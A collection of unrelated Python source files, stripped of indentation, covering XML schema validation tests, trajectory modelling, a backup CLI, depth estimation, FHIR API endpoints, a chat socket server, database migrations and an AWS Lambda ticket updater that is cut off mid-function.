assert str(m3_2) == str(d3)
m3_3 = after(one_or_more(start_tag_close_deriv(m211)), EMPTY)
assert str(m3_3) == str(d3)
m3_4 = after(one_or_more(m211), EMPTY)
m3_4 = After(OneOrMore(m211), EMPTY)
m3_4 = After(
OneOrMore(
Element(
Name({'ns': ''}, 'bar'),
EMPTY)),
EMPTY)
assert str(d3) == str(m3_4)
children = (
ElementNode(QName('', 'bar'), (), ()),
ElementNode(QName('', 'bar'), (), ()),
ElementNode(QName('', 'bar'), (), ()))
d4 = children_deriv(d3, children)
m4_1 = children_deriv(m3_4, children)
assert str(d4) == str(m4_1)
m4_2 = strip_children_deriv(m3_4, children)
assert str(d4) == str(m4_2)
child_0 = ElementNode(QName('', 'bar'), (), ())
m4_3 = child_deriv(m3_4, child_0)
child_0_qn = QName('', 'bar')
m41_1 = start_tag_open_deriv(m3_4, child_0_qn)
m31 = OneOrMore(
Element(
Name({'ns': ''}, 'bar'),
EMPTY))
m32 = EMPTY
m41_2 = apply_after(
partial(flip(after), m32), start_tag_open_deriv(m31, child_0_qn))
assert str(m41_1) == str(m41_2)
m5_1 = start_tag_open_deriv(m31, child_0_qn)
m311 = Element(
Name({'ns': ''}, 'bar'),
EMPTY)
m5_2 = apply_after(
partial(flip(group), choice(OneOrMore(m311), EMPTY)),
start_tag_open_deriv(m311, child_0_qn))
assert str(m5_1) == str(m5_2)
assert str(d4) == str(m4_3)
assert str(child_deriv(schema, doc)) == str(end_tag_deriv(d4))
assert nullable(child_deriv(schema, doc)) is True
TEST_CASES_PATH = os.path.join(os.getcwd(), 'tests', 'test_cases')
@pytest.mark.parametrize("test_dir", sorted(os.listdir(TEST_CASES_PATH)))
def test_jing(test_dir):
if test_dir in ('334', '337'):
return
test_path = os.path.join(TEST_CASES_PATH, test_dir)
os.chdir(test_path)
correct_schemas = []
invalid_schemas = []
valid_xmls = []
invalid_xmls = []
error_messages = {}
for test_file in os.listdir(test_path):
test_file_path = os.path.join(test_path, test_file)
root, ext = os.path.splitext(test_file)
if ext == '.rng':
if root.endswith('i'):
invalid_schemas.append(test_file_path)
elif root.endswith('c'):
correct_schemas.append(test_file_path)
elif ext == '.xml':
if root.endswith('i'):
invalid_xmls.append(test_file_path)
elif root.endswith('v'):
valid_xmls.append(test_file_path)
for correct_schema in correct_schemas:
with open(correct_schema, 'r') as schema_file:
schema_str = ''.join(schema_file.readlines())
print(schema_str)
schema = prang.Schema(schema_file_name=correct_schema)
for valid_xml in valid_xmls:
try:
schema.validate(doc_file_name=valid_xml)
except Exception as e:
with open(valid_xml, 'r') as valid_xml_file:
valid_xml_str = ''.join(valid_xml_file.readlines())
print(valid_xml_str)
print("The exception is ", e)
raise e
for invalid_xml in invalid_xmls:
print("Doing " + invalid_xml)
with pytest.raises(PrangException) as excinfo:
schema.validate(doc_file_name=invalid_xml)
with open(invalid_xml, 'r') as invalid_xml_file:
invalid_xml_str = ''.join(invalid_xml_file.readlines())
print(invalid_xml_str)
print(excinfo.value)
if invalid_xml in error_messages:
assert error_messages[invalid_xml] == str(excinfo.value)
for invalid_schema in invalid_schemas:
print("Doing " + invalid_schema)
with pytest.raises(PrangException):
prang.Schema(schema_file_name=invalid_schema)
with open(invalid_schema, 'r') as invalid_schema_file:
invalid_schema_str = ''.join(invalid_schema_file.readlines())
print(invalid_schema_str)
|
from gp_code.kernels import set_kernel
from gp_code.optimize_parameters import *
from utils.stats_trajectories import trajectory_arclength, trajectory_duration
from utils.manip_trajectories import get_linear_prior_mean
from utils.manip_trajectories import get_data_from_set
from utils.manip_trajectories import goal_center
from utils.stats_trajectories import euclidean_distance, avg_speed, median_speed
from utils.stats_trajectories import truncate
from sklearn.linear_model import LinearRegression, HuberRegressor
from sklearn.linear_model import Ridge
from sklearn.preprocessing import PolynomialFeatures
from sklearn.pipeline import make_pipeline
import logging
import math
import timeit
import numpy as np
# This structure keeps all the learned data
# about the set of goals
class goal_pairs:
# Constructor
def __init__(self, goals_areas, trainingSet, sigmaNoise=200.0, min_traj_number=5):
self.goals_n = len(goals_areas)
self.goals_areas = goals_areas
self.min_traj_number = min_traj_number
# Observation Noise
self.sigmaNoise = sigmaNoise
# Minimum value for speed to avoid numerical problems
self.epsilon = 0.1
# Flag to know if the pairs of goals have parameters
# that have been learned
self.learned = np.zeros((self.goals_n,self.goals_n),dtype=int)
# Mean length for all pairs of goals
self.medianLengths = np.zeros((self.goals_n,self.goals_n))
self.euclideanDistances = np.zeros((self.goals_n,self.goals_n))
self.units = np.zeros((self.goals_n,self.goals_n))
self.priorTransitions = np.zeros((self.goals_n,self.goals_n))
self.kernelsX = np.empty((self.goals_n,self.goals_n),dtype=object)
self.kernelsY = np.empty((self.goals_n,self.goals_n),dtype=object)
self.speedModels = np.zeros((self.goals_n,self.goals_n),dtype=object)
self.timeTransitionMeans= np.empty((self.goals_n,self.goals_n),dtype=object)
self.timeTransitionStd = np.empty((self.goals_n,self.goals_n),dtype=object)
# Compute the mean lengths
self.compute_median_lengths(trainingSet)
# Compute the distances between pairs of goals (as a nGoalsxnGoals matrix)
self.compute_euclidean_distances()
# Compute the ratios between average path lengths and inter-goal distances
self.compute_distance_unit()
        # Compute prior transition probabilities between goals
self.compute_prior_transitions(trainingSet)
# Compute transition probabilities between goals
self.compute_time_transitions(trainingSet)
# Compute speed models
self.optimize_speed_models(trainingSet)
# Fills in the matrix with the mean length of the trajectories
def compute_median_lengths(self, trajectories):
# For each pair of goals (gi,gj), compute the mean arc-length
for i in range(self.goals_n):
for j in range(self.goals_n):
if len(trajectories[i][j]) > 0:
arclengths = []
for trajectory in trajectories[i][j]:
tr_arclen = trajectory_arclength(trajectory)
arclengths.append(tr_arclen[-1])
m = np.mean(arclengths)
else:
m = 0
self.medianLengths[i][j] = m
# Fills in the Euclidean distances between goals
def compute_euclidean_distances(self):
for i in range(self.goals_n):
# Take the centroid of the ROI i
p = goal_center(self.goals_areas[i][1:])
for j in range(self.goals_n):
# Take the centroid of the ROI j
q = goal_center(self.goals_areas[j][1:])
d = euclidean_distance(p,q)
self.euclideanDistances[i][j] = d
    # For a given start goal, determines the closest goal (other than k) whose kernel has been optimized
def closest(self,start,k):
i1 = 0
d1 = math.inf
for i in range(0,self.goals_n):
if i!=k and self.kernelsX[start][i].optimized and self.euclideanDistances[start][i]<d1:
d1 = self.euclideanDistances[start][i]
i1 = i
return i1
# Computes the ratio between path length and linear path length
# (distance between goals)
def compute_distance_unit(self):
for i in range(self.goals_n):
for j in range(self.goals_n):
if(self.euclideanDistances[i][j] == 0 or self.medianLengths[i][j] == 0):
u = 1.0
else:
# Ratio between mean length and goal-to-goal distance
u = self.medianLengths[i][j]/self.euclideanDistances[i][j]
self.units[i][j] = u
# Fills in the probability transition matrix gi -> gj
def compute_prior_transitions(self,pathMat,epsilon=0.01):
for i in range(self.goals_n):
count = 0.
# Total count of trajectories outgoing from i
for j in range(self.goals_n):
count += len(pathMat[i][j])
for j in range(self.goals_n):
if count == 0:
self.priorTransitions[i][j] = epsilon
else:
val = float(len(pathMat[i][j]))/count
self.priorTransitions[i][j] = max(epsilon,float(truncate(val,8)))
s = np.sum(self.priorTransitions[i])
if s > 0.0 and s < 1.0:
d = truncate(1.0 - s,8)
self.priorTransitions[i][i] += float(d)
# For each pair, optimize speed model
def optimize_speed_models(self,trainingSet):
# For all the trajectories
for i in range(self.goals_n):
for j in range(self.goals_n):
trajSet = trainingSet[i][j]
# Only if we have enough trajectories
if len(trajSet) < self.min_traj_number:
continue
relativeSpeeds = []
lengths = []
for tr in trajSet:
# Times
t = tr[2]
# Average speed
v = avg_speed(tr)+self.epsilon
# Arc lengths
d = trajectory_arclength(tr)
for k in range(1,len(t)):
relativeSpeeds.append(float((d[k]-d[k-1])/(t[k]-t[k-1]))/v)
lengths.append(d[k])
lengths = np.array(lengths).reshape(-1, 1)
relativeSpeeds = np.array(relativeSpeeds)
self.speedModels[i][j]=make_pipeline(PolynomialFeatures(4),LinearRegression())
self.speedModels[i][j].fit(lengths, relativeSpeeds)
# For each pair of goals, realize the optimization of the kernel parameters
def optimize_kernel_parameters(self,kernelType,trainingSet):
# Build the kernel matrices with the default values
self.kernelsX = create_kernel_matrix(kernelType, self.goals_n, self.goals_n)
self.kernelsY = create_kernel_matrix(kernelType, self.goals_n, self.goals_n)
logging.info("Optimizing kernel parameters")
# For every pair of goals (gi, gj)
for i in range(self.goals_n):
for j in range(self.goals_n):
# Get the set of paths that go from i to j
paths = trainingSet[i][j]
# We optimize a GP only if we have enough trajectories
if len(paths) > self.min_traj_number:
start = timeit.default_timer()
# Get the path data as x,y,z (z is arclength)
x,y,l = get_data_from_set(paths)
# Build a kernel with the specified type and initial parameters theta
ker = set_kernel(kernelType)
# Set the linear prior
if self.kernelsX[i][j].linearPrior:
meanX, varX = get_linear_prior_mean(trainingSet[i][j], 'x')
ker.set_linear_prior(meanX[0],meanX[1],varX[0],varX[1])
theta = ker.get_optimizable_parameters()
logging.info("[{:d}][{:d}]".format(i,j))
logging.info("#trajectories: {:d}".format(len(l)))
logging.info("Initial values for the optimizable parameters: {}".format(theta))
# Fit parameters in X
thetaX = fit_parameters(l,x,ker,theta,self.sigmaNoise)
logging.info("Optimized parameters for x: {}".format(thetaX))
self.kernelsX[i][j].set_parameters(ker.get_parameters())
logging.info("Full parameters for x: {}".format(self.kernelsX[i][j].get_parameters()))
# Fit parameters in Y
ker = set_kernel(kernelType)
if self.kernelsY[i][j].linearPrior:
meanY, varY = get_linear_prior_mean(trainingSet[i][j], 'y')
ker.set_linear_prior(meanY[0],meanY[1],varY[0],varY[1])
thetaY = fit_parameters(l,y,ker,theta,self.sigmaNoise)
logging.info("Optimized parameters for y: {}".format(thetaY))
self.kernelsY[i][j].set_parameters(ker.get_parameters())
logging.info("Full parameters for y: {}".format(self.kernelsY[i][j].get_parameters()))
stop = timeit.default_timer()
execution_time = stop - start
logging.info("Parameter optimization done in {:2f} seconds".format(execution_time))
else:
self.kernelsX[i][j] = None
self.kernelsY[i][j] = None
def copyFromClosest(self,start,k):
        # When we have no data for a pair of goals, instantiate a kernel with parameters copied from the closest pair
j = self.closest(start,k)
# Build a kernel with the specified type and initial parameters theta
self.kernelsX[start][k] = set_kernel(self.kernelsX[start][j].type)
# Copying from j
self.kernelsX[start][k].set_parameters(self.kernelsX[start][j].get_parameters())
# TODO: should update the linear term to the line
logging.info("Full parameters for x: {}".format(self.kernelsX[start][k].get_parameters()))
        # Instantiate the y kernel as well, then copy its parameters from j
        self.kernelsY[start][k] = set_kernel(self.kernelsY[start][j].type)
        self.kernelsY[start][k].set_parameters(self.kernelsY[start][j].get_parameters())
logging.info("Full parameters for y: {}".format(self.kernelsY[start][k].get_parameters()))
return j
    # Fills in the time-transition statistics (mean and standard deviation of trajectory durations) between goal pairs
def compute_time_transitions(self, trMat):
for i in range(self.goals_n):
for j in range(self.goals_n):
M, SD = 0, 0
duration = []
if(len(trMat[i][j]) > self.min_traj_number):
for tr in trMat[i][j]:
duration.append(trajectory_duration(tr))
M = np.mean(duration)
SD = np.std(duration)
self.timeTransitionMeans[i][j] = M
self.timeTransitionStd[i][j] = SD
|
import os
from datetime import datetime
from cement import Controller, ex
from cement.utils import fs
from cement.utils.version import get_version_banner
from ..core.version import get_version
from ..core import exc
VERSION_BANNER = """
Lazily Backup Files and Directories %s
%s
""" % (get_version(), get_version_banner())
class Base(Controller):
class Meta:
label = 'base'
# text displayed at the top of --help output
description = 'Lazily Backup Files and Directories'
# text displayed at the bottom of --help output
epilog = 'Usage: dotbak /path/to/file'
# controller level arguments. ex: 'dotbak --version'
arguments = [
### add a version banner
( [ '-v', '--version' ],
{ 'action' : 'version',
'version' : VERSION_BANNER } ),
( [ '-s', '--suffix' ],
{ 'action' : 'store',
'dest' : 'suffix' ,
'help' : 'backup file/dir suffix (extension)' } ),
( [ 'path' ],
{ 'action' : 'store',
'help' : 'path to file/dir to backup' } ),
]
def _clean_path(self, path):
RSTRIP = ['/', '\\']
for char in RSTRIP:
            path = path.rstrip(char)
res = fs.abspath(path)
return res
def _default(self):
"""Default action if no sub-command is passed."""
path = self._clean_path(self.app.pargs.path)
if self.app.pargs.suffix is not None:
suffix = self.app.pargs.suffix
else:
suffix = self.app.config.get('dotbak', 'suffix')
if self.app.config.get('dotbak', 'timestamps') is True:
timestamp = datetime.now().strftime('%Y-%m-%d-%H:%M:%S')
suffix = f'{suffix}-{timestamp}'
if not os.path.exists(self.app.pargs.path):
raise exc.DotBakError(f'Path does not exist: {path}')
res = fs.backup(path, suffix=suffix)
self.app.log.info(f'Copied {path} -> {res}')
|
import argparse
import tensorflow as tf
import cv2
import matplotlib.pyplot as plt
def monocular_img(img_path):
"""Function to predict for a single image
"""
img = cv2.cvtColor(img_path, cv2.COLOR_BGR2RGB) / 255.0
img_resized = tf.image.resize(img, [256,256], method='bicubic', preserve_aspect_ratio=False)
#img_resized = tf.transpose(img_resized, [2, 0, 1])
img_input = img_resized.numpy()
mean=[0.485, 0.456, 0.406]
std=[0.229, 0.224, 0.225]
img_input = (img_input - mean) / std
reshape_img = img_input.reshape(1,256,256,3)
tensor = tf.convert_to_tensor(reshape_img, dtype=tf.float32)
# load the intel midas model
    model = r"model\lite-model_midas_v2_1_small_1_lite_1.tflite"
interpreter = tf.lite.Interpreter(model_path=model)
interpreter.allocate_tensors()
input_details = interpreter.get_input_details()
output_details = interpreter.get_output_details()
input_shape = input_details[0]['shape']
# inference
interpreter.set_tensor(input_details[0]['index'], tensor)
interpreter.invoke()
output = interpreter.get_tensor(output_details[0]['index'])
output = output.reshape(256, 256)
# output file
prediction = cv2.resize(output, (img.shape[1], img.shape[0]), interpolation=cv2.INTER_CUBIC)
print(" Write image to: output_depth.png")
depth_min = prediction.min()
depth_max = prediction.max()
img_out = (255 * (prediction - depth_min) / (depth_max - depth_min)).astype("uint8")
cv2.imwrite("output_depth.png", img_out)
plt.imshow(img_out)
plt.show()
return img_out
if __name__ == '__main__':
parser = argparse.ArgumentParser()
parser.add_argument('img')
args = parser.parse_args()
img_path = cv2.imread(args.img)
mono = monocular_img(img_path)
|
import sys
import json
import os
sys.path.append("../brreg_announce")
from brreg_announce.brreg import Announcements
ann = Announcements()
res = ann.search(
fetch_details=True,
datoFra='01.01.2015',
datoTil='31.12.2015',
id_niva1=51,
id_niva2=56,
#id_niva3=41,
id_region=300,
id_fylke=46,
id_kommune=4601
)
#res = ann.search(
# orgnr=954478696
#)
print('Rows %i' % res['count'])
with open(os.getenv('HOME') + '/konkurser_bergen_med_detaljer_2015.json', 'w') as outfile:
json.dump(res, outfile, ensure_ascii=False)
#endring forretningsadresse: &id_niva1=9&id_niva2=38&id_niva3=41
|
import os
from starlette.applications import Starlette
from starlette.responses import Response
from starlette.endpoints import HTTPEndpoint
from FHIR.utilities import Utilities
create = Starlette()
"""
@api {post} /create/organization Populate a FHIR Organization template with the supplied values
@apiName CreateOrganization
@apiGroup Create
@apiParam {String} id Unique ID of this organization.
"""
@create.route("/Organization")
class Organization(HTTPEndpoint):
async def post(self, request):
return Response("", Utilities.createFHIRResource("Organization", await request.body()), {}, "");
"""
@api {post} /create/practitioner Populate a FHIR Practitioner template with the supplied values
@apiName CreatePractitioner
@apiGroup Create
@apiParam {String} id Unique ID of this practitioner.
@apiParam {String} familyName Practitioner family name.
@apiParam {String} givenName Practitioner given name.
"""
@create.route("/Practitioner")
class Practitioner(HTTPEndpoint):
async def post(self, request):
return Response("", Utilities.createFHIRResource("Practitioner", await request.body()), {}, "");
"""
@api {post} /create/patient Populate a FHIR Patient template with the supplied values
@apiName CreatePatient
@apiGroup Create
@apiParam {String} id Unique ID of this patient.
@apiParam {String} title Patient title.
@apiParam {String} familyName Patient family name.
@apiParam {String} givenName Patient given name.
@apiParam {String} birthDate Patient date of birth.
@apiParam {String} organizationReference ID of Organization with which the patient is registered.
@apiParam {String} ethnicityCode Code used for patient ethnicity.
@apiParam {String} ethnicityDisplay Text associated with patient ethnicity.
"""
@create.route("/Patient")
class Patient(HTTPEndpoint):
async def post(self, request):
return Response("", Utilities.createFHIRResource("Patient", await request.body()), {}, "");
"""
@api {post} /create/condition Populate a FHIR Condition template with the supplied values
@apiName CreateCondition
@apiGroup Create
@apiParam {String} id Unique ID of this condition.
@apiParam {String} codeSystem Code system used for this condition.
@apiParam {String} code Code used for this condition.
@apiParam {String} display Text associated with this condition.
@apiParam {String} subjectReference The ID of the patient to whom this condition pertains.
@apiParam {String} practitionerReference The ID of the practitioner who diagnosed this condition.
"""
@create.route("/Condition")
class Condition(HTTPEndpoint):
async def post(self, request):
return Response("", Utilities.createFHIRResource("Condition", await request.body()), {}, "");
"""
@api {post} /create/medication Populate a FHIR Medication template with the supplied values
@apiName CreateMedication
@apiGroup Create
@apiParam {String} id Unique ID of this medication.
@apiParam {String} codeSystem Code system used for this medication.
@apiParam {String} code Code used for this medication.
@apiParam {String} display Text associated with this medication.
"""
@create.route("/Medication")
class Medication(HTTPEndpoint):
async def post(self, request):
return Response("", Utilities.createFHIRResource("Medication", await request.body()), {}, "");
"""
@api {post} /create/dispense Populate a FHIR MedicationDispense template with the supplied values
@apiName CreateDispense
@apiGroup Create
@apiParam {String} id Unique ID of this dispense of medication.
@apiParam {String} medicationReference The ID of the medication involved in this dispense.
@apiParam {String} subjectReference The ID of the patient that is taking this medication.
@apiParam {String} practitionerReference The ID of the practitioner that prescribed this medication.
@apiParam {String} organizationReference The ID of the organization the practitioner is associated with.
"""
@create.route("/MedicationDispense")
class Dispense(HTTPEndpoint):
async def post(self, request):
return Response("", Utilities.createFHIRResource("MedicationDispense", await request.body()), {}, "");
@create.route("/Subscription")
class Subscription(HTTPEndpoint):
async def post(self, request):
return Response("", Utilities.createFHIRResource("Subscription", await request.body()), {}, "");
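# ---------------------------------------------------------------------------
# Illustrative client sketch (not part of the service). It POSTs the fields
# documented in the @api block for /create/patient above. The host, port,
# the "/create" mount point and the JSON body format are assumptions; the
# endpoint simply forwards the raw request body to Utilities.createFHIRResource.
# ---------------------------------------------------------------------------
def _example_create_patient(base_url="http://localhost:8000"):
    import json
    import urllib.request
    payload = {
        "id": "patient-001",
        "title": "Ms",
        "familyName": "Example",
        "givenName": "Alex",
        "birthDate": "1980-01-01",
        "organizationReference": "org-001",
        "ethnicityCode": "A",
        "ethnicityDisplay": "Example ethnicity",
    }
    req = urllib.request.Request(
        base_url + "/create/Patient",
        data=json.dumps(payload).encode("utf-8"),
        headers={"Content-Type": "application/json"},
        method="POST",
    )
    with urllib.request.urlopen(req) as resp:
        return resp.status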
|
"""
Tests for aiohttp-toolbox without [all] installed
"""
import pytest
from pydantic import BaseSettings as PydanticBaseSettings
async def test_create_no_setting():
from atoolbox import create_default_app
from atoolbox.create_app import startup, cleanup
app = await create_default_app()
assert app['settings'] is None
assert 'auth_fernet' not in app
assert 'http_client' not in app
assert len(app.middlewares) == 3
await startup(app)
assert 'http_client' not in app
assert 'pg' not in app
assert 'redis' not in app
await cleanup(app)
async def test_create_setting():
from atoolbox import BaseSettings, create_default_app
from atoolbox.create_app import startup, cleanup
settings = BaseSettings()
app = await create_default_app(settings=settings)
assert app['settings'] is not None
assert 'auth_fernet' not in app
assert 'http_client' not in app
assert len(app.middlewares) == 3
await startup(app)
assert 'http_client' in app
assert 'pg' not in app
assert 'redis' not in app
await cleanup(app)
async def test_create_setting_warnings():
from atoolbox import create_default_app
from atoolbox.create_app import startup, cleanup
class Settings(PydanticBaseSettings):
pg_dsn = 'x'
redis_settings = True
auth_key = True
with pytest.warns(RuntimeWarning) as record:
# can't use normal BaseSettings as parse_redis_settings would raise an error
app = await create_default_app(settings=Settings())
assert len(record) == 2
assert app['settings'] is not None
with pytest.warns(RuntimeWarning) as record:
await startup(app)
assert len(record) == 2
assert 'pg' not in app
assert 'redis' not in app
await cleanup(app)
async def test_settings_defaults_none():
from atoolbox.settings import BaseSettings, RedisSettings
assert RedisSettings.__module__ == 'atoolbox.settings'
s = BaseSettings()
assert s.redis_settings is None
assert s.pg_dsn is None
assert s.auth_key is None
with pytest.raises(RuntimeError):
BaseSettings(redis_settings='redis://localhost:6379')
|
from functools import partial
from pd_lda import pd_lda
import pandas as pd
df = pd.read_pickle('calendar_events_old.df')
df_one = df[:len(df)-20]
df_two = df[len(df)-20:len(df)]
pdlda = pd_lda()
model = pdlda.update_lda(df_one, ['name'])
print(model.show_topic(1))
# mymodel = model.copy()
new_model = pdlda.update_lda(df_two, ['name'])
print(new_model.show_topic(1))
new_df = pdlda.add_lda_column(df, ['name'], new_model)
class mytest(object):
def __init__(self):
self.x = 33
def realtest(self, index):
return index + self.x
def tester(self):
        x = list(map(self.realtest, range(10)))
        print(x)
def func1(self, y, z):
        print("first: " + str(y))
        print("second: " + str(z))
def test(self):
new = partial(self.func1, 2)
new(3)
|
import socket
from threading import Thread
import threading
class Server:
def __init__(self):
sock.bind(("localhost", 8000))
sock.listen(10)
self.connections = []
def get_socket(self):
while True:
connection, addr = sock.accept()
self.connections.append({"user": connection, "socket": addr})
print("connected:", addr)
Thread(target=self.check_messages, args=(connection,)).start()
def check_messages(self, connection):
while True:
try:
data = connection.recv(4096)
message = str(data.decode())
self.send_message(connection, message)
except Exception as ex:
self.remove_user(connection)
break
def remove_user(self, user):
for connection in self.connections:
if connection["user"] == user:
self.connections.remove(connection)
break
def send_message(self, user, message):
message += "\n"
for connection in self.connections:
if connection["user"] != user:
print(message)
connection["user"].send(message.encode())
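# ---------------------------------------------------------------------------
# Illustrative client sketch (not part of the original server): connect to the
# server above on localhost:8000 and send one message. send_message() relays
# it to every *other* connected client, so run at least two clients in
# separate processes to see traffic.
# ---------------------------------------------------------------------------
def example_client(text="hello"):
    client = socket.socket()
    client.connect(("localhost", 8000))
    client.send(text.encode())
    client.close()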
if __name__ == "__main__":
sock = socket.socket()
server = Server()
    thread = threading.Thread(target=server.get_socket)
thread.start()
thread.join()
|
# encoding: utf-8
import datetime
from south.db import db
from south.v2 import SchemaMigration
from django.db import models
class Migration(SchemaMigration):
def forwards(self, orm):
# Adding model 'Helptext'
db.create_table('okhelptexts_helptext', (
('id', self.gf('django.db.models.fields.AutoField')(primary_key=True)),
('fulltext', self.gf('django.db.models.fields.TextField')()),
))
db.send_create_signal('okhelptexts', ['Helptext'])
# Adding model 'Keyword'
db.create_table('okhelptexts_keyword', (
('id', self.gf('django.db.models.fields.AutoField')(primary_key=True)),
('helptext', self.gf('django.db.models.fields.related.ForeignKey')(to=orm['okhelptexts.Helptext'])),
('kw_text', self.gf('django.db.models.fields.CharField')(max_length=200)),
))
db.send_create_signal('okhelptexts', ['Keyword'])
def backwards(self, orm):
# Deleting model 'Helptext'
db.delete_table('okhelptexts_helptext')
# Deleting model 'Keyword'
db.delete_table('okhelptexts_keyword')
models = {
'okhelptexts.helptext': {
'Meta': {'object_name': 'Helptext'},
'fulltext': ('django.db.models.fields.TextField', [], {}),
'id': ('django.db.models.fields.AutoField', [], {'primary_key': 'True'})
},
'okhelptexts.keyword': {
'Meta': {'object_name': 'Keyword'},
'helptext': ('django.db.models.fields.related.ForeignKey', [], {'to': "orm['okhelptexts.Helptext']"}),
'id': ('django.db.models.fields.AutoField', [], {'primary_key': 'True'}),
'kw_text': ('django.db.models.fields.CharField', [], {'max_length': '200'})
}
}
complete_apps = ['okhelptexts']
|
import os
import os.path as path
import subprocess
import unittest
import test_system_common as common
APPARGUMENT_INPUTFILE_SAMPLE_VALUE = r'test_data\311_calls_for_service_requests_all_strings\311_calls_for_service_requests_sample.dat'
APPARGUMENT_INPUTFILE_FULL_VALUE = r'test_data\311_calls_for_service_requests_all_strings\311_calls_for_service_requests.dat'
APPARGUMENT_OUTPUTFOLDER_VALUE =r'test_data\311_calls_for_service_requests_all_strings\output'
APPARGUMENT_LAYPOUTFILE_VALUE =r'layout_repository\311_calls_for_service_requests_all_strings.json'
APPARGUMENT_LOGFOLDER_VALUE =r'test_data\311_calls_for_service_requests_all_strings\log'
VALIDATION_SAMPLE_FOLDER_VALUE = r'test_data\311_calls_for_service_requests_all_strings\validate'
PERFORMANCE_LOGFILE_VALUE =r'test_data\311_calls_for_service_requests_all_strings\performance_log\ebcdic_converter_performance.log'
DATA_SEGMENTS = ["main"]
class TestEbcdicConverter(unittest.TestCase):
@classmethod
def setUpClass(self):
print("\n\nPreparing data... 311 calls for service requests all strings")
codePath = path.dirname(__file__)
self.testEnvironment = common.Setup.getSetupEnvironmentDesctiption(codePath)
self.testType = common.Setup.getSetupTestType(codePath)
inputFile = APPARGUMENT_INPUTFILE_SAMPLE_VALUE
if self.testType==common.TestType.Performance:
inputFile = APPARGUMENT_INPUTFILE_FULL_VALUE
self.appArguments = common.AppArguments(codePath)
self.appArguments.addArgumentValue(self.appArguments.APPARGUMENT_INPUTFILE, inputFile)
self.appArguments.addArgumentValue(self.appArguments.APPARGUMENT_OUTPUTFOLDER, APPARGUMENT_OUTPUTFOLDER_VALUE)
self.appArguments.addArgumentValue(self.appArguments.APPARGUMENT_LAYPOUTFILE, APPARGUMENT_LAYPOUTFILE_VALUE)
self.appArguments.addArgumentValue(self.appArguments.APPARGUMENT_LOGFOLDER, APPARGUMENT_LOGFOLDER_VALUE)
self.appArguments.addArgumentValue(self.appArguments.VALIDATION_SAMPLE_FOLDER, VALIDATION_SAMPLE_FOLDER_VALUE)
self.appArguments.addArgumentValue(self.appArguments.PERFORMANCE_LOGFILE, PERFORMANCE_LOGFILE_VALUE)
#create folder structure
folders = [self.appArguments.APPARGUMENT_OUTPUTFOLDER, self.appArguments.APPARGUMENT_LOGFOLDER, self.appArguments.VALIDATION_SAMPLE_FOLDER, self.appArguments.PERFORMANCE_LOGFILE]
for folderKey in folders:
folderPath = self.appArguments.getArgumentValue(folderKey)
if folderKey==self.appArguments.PERFORMANCE_LOGFILE:
folderPath = path.dirname(folderPath)
if not path.exists(folderPath):
os.mkdir(folderPath)
#delete any already existing output converted files
for segmentName in DATA_SEGMENTS:
filePath = self.appArguments.getOutputFilePath(segmentName)
if path.exists(filePath):
os.remove(filePath)
self.runStats = common.RunStats()
self.runStats.storeCompletedProcess(subprocess.run(args=["python.exe", self.appArguments.getAppArgument(),
self.appArguments.getArgument(self.appArguments.APPARGUMENT_INPUTFILE),
self.appArguments.getArgument(self.appArguments.APPARGUMENT_OUTPUTFOLDER),
self.appArguments.getArgument(self.appArguments.APPARGUMENT_LAYPOUTFILE),
self.appArguments.getArgument(self.appArguments.APPARGUMENT_LOGFOLDER)
],
stdout=subprocess.PIPE,
stderr=subprocess.STDOUT))
print(self.runStats.getOutput())
if self.testType==common.TestType.Performance:
print()
print("-----------No tests completed. Just reporting performance-----------")
def tearDown(self):
# release resources
pass
@classmethod
def tearDownClass(self):
#store performance info
#write in performance log if no run-time error
self.runStats.savePerformanceLog(self.appArguments, self.testEnvironment)
@unittest.skipIf(common.Setup.getSetupTestType(path.dirname(__file__))==common.TestType.Performance, "Don't run to get performance")
def test_01_ReturnCode(self):
self.assertEqual(self.runStats.getReturnCode(), 0, "Converter returns other than 0 return code")
@unittest.skipIf(common.Setup.getSetupTestType(path.dirname(__file__))==common.TestType.Performance, "Don't run to get performance")
def test_02_NumberRecords(self):
segmentRecordCount = {"main":1000}
for segmentName in DATA_SEGMENTS:
self.assertEqual(self.runStats.getNumberRecords(segmentName), segmentRecordCount[segmentName], "Wrong number of converted records")
@unittest.skipIf(common.Setup.getSetupTestType(path.dirname(__file__))==common.TestType.Performance, "Don't run to get performance")
def test_03_CompareContent(self):
for segmentName in DATA_SEGMENTS:
lineNumber = 0
with open(self.appArguments.getOutputFilePath(segmentName), 'r', encoding="utf-8") as convertedFile:
with open(self.appArguments.getValidationSampleFilePath(segmentName), 'r', encoding="utf-8") as validationSampleFile:
for convertedLine in convertedFile:
validationLine = validationSampleFile.readline()
lineNumber += 1
self.assertEqual(convertedLine, validationLine, "Content doesn't match in line: " + str(lineNumber))
if __name__=="__main__":
unittest.main()
|
"""
This Lambda shows how a staff member managing SupportBot would update the status of a given ticket.
"""
import json
import datetime
import time
import os
import dateutil.parser
import logging
import uuid
import boto3
from boto3.dynamodb.conditions import Key, Attr
logger = logging.getLogger()
logger.setLevel(logging.DEBUG)
# --- Main handler ---
def lambda_handler(event, context):
"""
Route the incoming request based on intent.
The JSON body of the request is provided in the event slot.
"""
# By default, treat the user request as coming from the America/New_York time zone.
os.environ['TZ'] = 'America/New_York'
time.tzset()
logger.debug('event.bot.name={}'.format(event['bot']['name']))
logger.debug('event={}'.format(event))
session_attributes = event['sessionAttributes']
if session_attributes is None:
session_attributes = {}
session_attributes['lastIntent'] = event['currentIntent']['name']
# session_attributes['submitterName'] = event['currentIntent']['slots']['first_name']
    # Before closing the intent, look the case up in the database and update its status
record = getFromDB(event['currentIntent']['slots'])
slots = event['currentIntent']['slots']
if record is None:
        response_string = "We were unable to locate support case " + event['currentIntent']['slots']['ticket_id'] + ". Please check your case id and try again."
else:
updateStatus(slots['ticket_id'],slots['status'])
response_string = 'We have found and updated your support case. The status is now '+ slots['status'] + ' and was last updated '+ time.strftime('%Y-%m-%d %H:%M:%S', time.localtime(float(record['LastUpdatedDate'])))
return close(session_attributes, 'Fulfilled', {'contentType': 'PlainText','content': response_string})
def getFromDB(slots):
dynamodb = boto3.resource('dynamodb')
db_table_name = os.environ['DynamoDB_Table_Name']
table = dynamodb.Table(db_table_name)
logger.debug("looking up key CaseId="+slots['ticket_id'])
response = table.query(KeyConditionExpression=Key('CaseId').eq(slots['ticket_id']))
logger.debug(str(response))
return response['Items'][0]
def updateStatus(ticketId,updatedStatus):
logger.debug("changing status to="+updatedStatus)
dynamodb = boto3.resource('dynamodb')
db_table_name = os.environ['DynamoDB_Table_Name']
table = dynamodb.Table(db_table_name)
response = table.update_item(
Key={
